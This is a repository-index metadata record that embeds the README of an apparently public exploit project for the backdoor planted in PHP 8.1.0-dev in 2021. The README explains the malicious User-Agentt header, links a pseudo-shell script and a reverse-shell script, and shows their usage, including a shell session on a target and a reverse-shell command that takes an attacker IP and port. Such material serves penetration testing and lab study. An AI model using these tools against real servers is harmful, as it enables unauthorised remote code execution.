{"id":17383113,"url":"https://github.com/flast101/php-8.1.0-dev-backdoor-rce","last_synced_at":"2025-04-15T09:52:22.307Z","repository":{"id":49999622,"uuid":"370041265","full_name":"flast101/php-8.1.0-dev-backdoor-rce","owner":"flast101","description":"PHP 8.1.0-dev Backdoor System Shell Script","archived":false,"fork":false,"pushed_at":"2021-06-06T11:58:05.000Z","size":1776,"stargazers_count":90,"open_issues_count":0,"forks_count":22,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-03-28T19:06:46.640Z","etag":null,"topics":["backdoor","code","code-injection","exploit","exploit-development","pentest","pentest-tool","php-810-dev","php8","php810-dev","python","python3","rce","remote-code-execution","security","shell","shell-script","shell-scripts","user-agent","user-agentt"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/flast101.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-05-23T12:01:05.000Z","updated_at":"2025-02-27T07:42:57.000Z","dependencies_parsed_at":"2022-08-29T17:11:57.410Z","dependency_job_id":null,"html_url":"https://github.com/flast101/php-8.1.0-dev-backdoor-rce","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flast101%2Fphp-8.1.0-dev-backdoor-rce","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flast101%2Fphp-8.1.0-dev-backdoor-rce/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flast101%2Fphp-8.1.0-dev-backdoor-rce/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flast101%2Fphp-8.1.0-dev-backdoor-rce/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/flast101","download_url":"https://codeload.github.com/flast101/php-8.1.0-dev-backdoor-rce/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249048712,"owners_count":21204305,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","code","code-injection","exploit","exploit-development","pentest","pentest-tool","php-810-dev","php8","php810-dev","python","python3","rce","remote-code-execution","security","shell","shell-script","shell-scripts","user-agent","user-agentt"],"created_at":"2024-10-16T07:40:37.903Z","updated_at":"2025-04-15T09:52:22.291Z","avatar_url":"https://github.com/flast101.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PHP 8.1.0-dev Backdoor Remote Code Execution\n_PHP 8.1.0-dev Backdoor System Shell Script_\n\n![docs/logo_php81.png](docs/logo_php81.png \"docs/logo_php81.png\")\n\nPHP verion 8.1.0-dev was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.   \n\nThe original code was restored after the issue was discovered, but then tampered with a second time. The breach would have created a backdoor in any websites that ran the compromised version of PHP, enabling hackers to perform remote code execution on the site.\n\n_Read full article: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/_\n\n\n* * * \n\n## POC Script\n\nThis short exploit script [backdoor_php_8.1.0-dev.py](https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py) uses the backdoor to provide a pseudo system shell on the host.Find it on [Exploit DB](https://www.exploit-db.com/exploits/49933).    \n\n- **Exploit Title:** PHP 8.1.0-dev Backdoor Remote Code Execution    \n- **Date:** 23 may 2021   \n- **Exploit Author:** flast101   \n- **Vendor Homepage:** [https://www.php.net/](https://www.php.net/)    \n- **Software Link:** [https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor](https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor)            \n- **Tested on version:** 8.1.0-dev    \n- **CVE** : N/A    \n- **Vulnerability references**:    \n[https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a](https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a)    \n[https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md](https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md)    \n\n\n\nUsage:\n\n\n```\n┌──(user㉿kali)-[~/Documents]\n└─$ python3 backdoor_php_8.1.0-dev.py\n  \nEnter the host url:\nhttp://a.b.c.d\n\nInteractive shell is opened on http://a.b.c.d \nCan't acces tty; job crontol turned off.\n$ id\nuid=1000(user) gid=1000(user) groups=1000(user)\n```\n\n* * * \n\n## Reverse Shell    \n\nThis short exploit script [revshell_php_8.1.0-dev.py](https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py) gives a reverse shell on target.\n\n\nUsage:\n\n\n```\n┌──(user㉿kali)-[~/Documents]\n└─$ python3 revshell_php_8.1.0-dev.py \u003ctarget URL\u003e \u003cattacker IP\u003e \u003cattacker PORT\u003e\n```\n\n![docs/revshell-script.png](docs/revshell-script.png \"docs/revshell-script.png\")\n\nBe Curious, Learning is Life ! :smiley:\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflast101%2Fphp-8.1.0-dev-backdoor-rce","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fflast101%2Fphp-8.1.0-dev-backdoor-rce","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflast101%2Fphp-8.1.0-dev-backdoor-rce/lists"}